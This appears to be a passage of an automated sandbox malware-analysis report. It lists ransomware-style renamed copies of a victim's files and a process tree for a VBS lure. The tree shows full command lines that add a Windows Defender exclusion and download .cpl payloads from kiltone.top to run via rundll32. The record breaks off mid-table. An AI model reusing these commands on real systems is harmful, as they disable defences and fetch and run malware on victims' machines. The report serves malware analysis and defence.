C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6260e81e-5ef5-4137-a0a5-7930ea6f0a75.Obuv
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6786f292-c1be-4996-99cd-77aa855c1844.YKcf
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\edd11145-a3b3-4ebf-ba7b-14b7ec08f19f.qhMV
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\ff032c8b-05e6-43c9-9e84-732dbe7aca27.CekY
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\search.json.mozlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\search.json.mozlz4.mlQR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.json.OUln (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\previous.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\previous.jsonlz4.jeiX
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528.bEoR
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore.jsonlz4.xMDl (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\shield-preference-experiments.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\shield-preference-experiments.json.jMtw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage.sqlite.DJrM (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\ls-archive.sqlite.rOuh (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\.metadata-v2.xXYP
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm.huxQ
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.xBHk
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm.iHWS
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.wVlF
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm.LPun
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite.kqQA
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm.QYzp
(copy)
|
big endian ispell hash file (?),
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite.OGdw
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm.pTds
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.qySf
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm.Ztqc
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite.zbTA
(copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\targeting.snapshot.json.pzAy (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\times.json.Wmat (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-shm.XQpa (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite.Jxjh (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\times.json.vBOp (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini.azAV (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini.FdKp (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\AQRFEVRTGL.png.sbdO (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\BQJUWOYRTO.jpg.IqMW (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\BUFZSQPCOH.png.NBWw (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\BWETZDQDIB.mp3.rFzU (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\GNLQNHOLWB.mp3.Lbza (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV.docx.PeLY (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV.jpg.VpGc (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV.xlsx.yYUH (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\BQJUWOYRTO.jpg.atnv (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\BUFZSQPCOH.png.tYxa (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\BWETZDQDIB.mp3.JYpC (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\HMPPSXQPQV.docx.guar (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\LHEPQPGEWF.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\LHEPQPGEWF.pdf.HYRw (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.xlsx.CWZi (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\HQJBRDYKDE.png.OfAq (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH.docx.RHmK (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH.xlsx.UeMf (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\HMPPSXQPQV.xlsx.UaxH (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\HQJBRDYKDE.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\HQJBRDYKDE.png.LgrX (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\LFOPODGVOH.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\LFOPODGVOH.docx.SaHb (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\LHEPQPGEWF.mp3.XmnB (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\QFAPOWPAFG.jpg.vkDU (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\VWDFPKGDUF.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\VWDFPKGDUF.pdf.sjrJ (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LHEPQPGEWF.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\LHEPQPGEWF.jpg.YDun (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LHEPQPGEWF.mp3.LjtE (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LHEPQPGEWF.pdf
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Desktop\LHEPQPGEWF.pdf.PJxs (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG.docx.NTIB (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG.pdf.tnWO (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\GNLQNHOLWB.mp3.oPva (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\LHEPQPGEWF.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\LHEPQPGEWF.jpg.qFLQ (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\LIJDSFKJZG.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\LIJDSFKJZG.docx.FDqX (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\PWZOQIFCAN.png.fEen (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\SNIPGPPREP.pdf.iHFW (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\VWDFPKGDUF.xlsx.bwJP (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS_1.vbs.cpHo (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWZOQIFCAN.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWZOQIFCAN.png.rzdD (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QFAPOWPAFG.jpg.rjgv (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QFAPOWPAFG.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\QFAPOWPAFG.xlsx.Iftn (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SNIPGPPREP.pdf.qHBF (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV.docx.KdeN (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\HMPPSXQPQV.jpg.fPHC (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\LFOPODGVOH.xlsx.vZmS (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\LIJDSFKJZG.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\LIJDSFKJZG.pdf.vXMS (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\UNKRLCVOHV.docx.NjkO (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\VWDFPKGDUF.mp3
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\VWDFPKGDUF.mp3.DrwF (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Desktop\VWDFPKGDUF.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\VWDFPKGDUF.mp3.Ejpl (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\VWDFPKGDUF.pdf.ELgz (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\VWDFPKGDUF.xlsx.ujhP (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\AQRFEVRTGL.png.cYvT (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\BQJUWOYRTO.jpg.yiRS (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\BUFZSQPCOH.png.ZuiF (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\BWETZDQDIB.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\BWETZDQDIB.mp3.sITu (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\GNLQNHOLWB.mp3.ZjOU (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV.docx.Kzvg (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV.jpg.qprS (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV.xlsx.QVHr (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\BQJUWOYRTO.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\BQJUWOYRTO.jpg.enby (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\BUFZSQPCOH.png.sUKE (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\BWETZDQDIB.mp3.mMNI (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\HMPPSXQPQV.docx.zVPg (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\LHEPQPGEWF.pdf.dyuZ (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\QFAPOWPAFG.xlsx.QUcN (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\HQJBRDYKDE.png.tTVf (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH.docx.IKPD (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH.xlsx.xWNT (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\HMPPSXQPQV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\HMPPSXQPQV.xlsx.MJzX (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\HQJBRDYKDE.png.uXJd (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\LFOPODGVOH.docx.VqMu (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\LHEPQPGEWF.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\LHEPQPGEWF.mp3.vYJu (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\QFAPOWPAFG.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\QFAPOWPAFG.jpg.xGvQ (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\VWDFPKGDUF.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\VWDFPKGDUF.pdf.zRdV (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LHEPQPGEWF.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\LHEPQPGEWF.jpg.CNhZ (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LHEPQPGEWF.mp3.XGOT (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LHEPQPGEWF.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\LHEPQPGEWF.pdf.IAVc (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG.docx.iDnU (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG.pdf.buHx (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\GNLQNHOLWB.mp3.xENX (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\LHEPQPGEWF.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\LHEPQPGEWF.jpg.IzkW (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\LIJDSFKJZG.docx.oCdV (copy)
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\PWZOQIFCAN.png.YaBs (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\SNIPGPPREP.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\SNIPGPPREP.pdf.YedO (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\VWDFPKGDUF.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\VWDFPKGDUF.xlsx.gEJq (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWZOQIFCAN.png.Kkto (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QFAPOWPAFG.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\QFAPOWPAFG.jpg.kKOY (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QFAPOWPAFG.xlsx.mQZq (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SNIPGPPREP.pdf.iwpd (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV.docx.cypm (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\AQRFEVRTGL.png
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\AQRFEVRTGL.png.nDFw (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\HMPPSXQPQV.jpg.isFn (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\LFOPODGVOH.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\LFOPODGVOH.xlsx.HtAb (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\LIJDSFKJZG.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\LIJDSFKJZG.pdf.xEaD (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\UNKRLCVOHV.docx.aPpg (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\VWDFPKGDUF.mp3.zWQe (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\VWDFPKGDUF.mp3.cWEJ (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\VWDFPKGDUF.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\VWDFPKGDUF.pdf.lYth (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\VWDFPKGDUF.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\VWDFPKGDUF.xlsx.gPdX (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\203bc979-cd5e-4f09-aae9-7003f9ad3c6e.tmp
|
PDF document, version 1.6 (zip deflate encoded)
|
dropped
|
||
C:\Users\user\Downloads\99044015-9ccc-4f82-9a07-de08dfe21d12.tmp
|
PDF document, version 1.6 (zip deflate encoded)
|
dropped
|
||
C:\Users\user\Downloads\AQRFEVRTGL.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\AQRFEVRTGL.png.yWQt (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\BQJUWOYRTO.jpg
|
data
|
dropped
|
||
C:\Users\user\Downloads\BQJUWOYRTO.jpg.hTjf (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\BUFZSQPCOH.png.CzNe (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\BWETZDQDIB.mp3.wHns (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\GNLQNHOLWB.mp3.ybDU (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\HMPPSXQPQV.docx.efuP (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\HMPPSXQPQV.jpg.plfr (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\HMPPSXQPQV.xlsx
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\Downloads\HMPPSXQPQV.xlsx.EenZ (copy)
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\Downloads\HQJBRDYKDE.png.eTLY (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\LFOPODGVOH.docx.ciIl (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\LFOPODGVOH.xlsx.Rmcs (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\LHEPQPGEWF.jpg.XrhQ (copy)
|
Dyalog APL aplcore version -21.-102
|
dropped
|
||
C:\Users\user\Downloads\LHEPQPGEWF.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\LHEPQPGEWF.mp3.gHNv (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\LHEPQPGEWF.pdf.jQaV (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\LIJDSFKJZG.docx.WyOm (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\LIJDSFKJZG.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\LIJDSFKJZG.pdf.Ctho (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PWZOQIFCAN.png.uFGd (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\QFAPOWPAFG.jpg.HBjx (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\QFAPOWPAFG.xlsx.agRF (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\SNIPGPPREP.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\SNIPGPPREP.pdf.LRxo (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\UNKRLCVOHV.docx.ZgLw (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\VWDFPKGDUF.mp3.zuWD (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\VWDFPKGDUF.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\VWDFPKGDUF.pdf.RwZL (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\VWDFPKGDUF.xlsx
|
data
|
dropped
|
||
C:\Users\user\Downloads\VWDFPKGDUF.xlsx.dRIb (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\downloaded.pdf.crdownload
|
PDF document, version 1.6 (zip deflate encoded)
|
dropped
|
||
C:\Users\user\Downloads\downloaded.pdf.iqBn (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Amazon.url.RMKT (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Favorites\Bing.url.IcKf (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Facebook.url.kvno (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Google.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Google.url.BgnI (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Live.url.zNJf (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Favorites\NYTimes.url.ctSi (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Reddit.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Reddit.url.VoUx (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Twitter.url.aory (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Wikipedia.url.mszi (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Favorites\Youtube.url.mNjl (copy)
|
data
|
dropped
|
||
C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms.pLvf (copy)
|
data
|
dropped
|
||
C:\Users\user\ntuser.ini.tbeA (copy)
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
Chrome Cache Entry: 592
|
HTML document, ASCII text, with very long lines (6862)
|
downloaded
|
||
Chrome Cache Entry: 593
|
PDF document, version 1.6 (zip deflate encoded)
|
downloaded
|
||
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 825 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS_1.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2000,i,4385509434330054281,2454780159223617298,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c control C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\SysWOW64\rundll32.exe
|
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c %temp%/eryy65ty.exe
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
C:\Users\user~1\AppData\Local\Temp/eryy65ty.exe
|
||
C:\Windows\System32\wbem\WMIC.exe
|
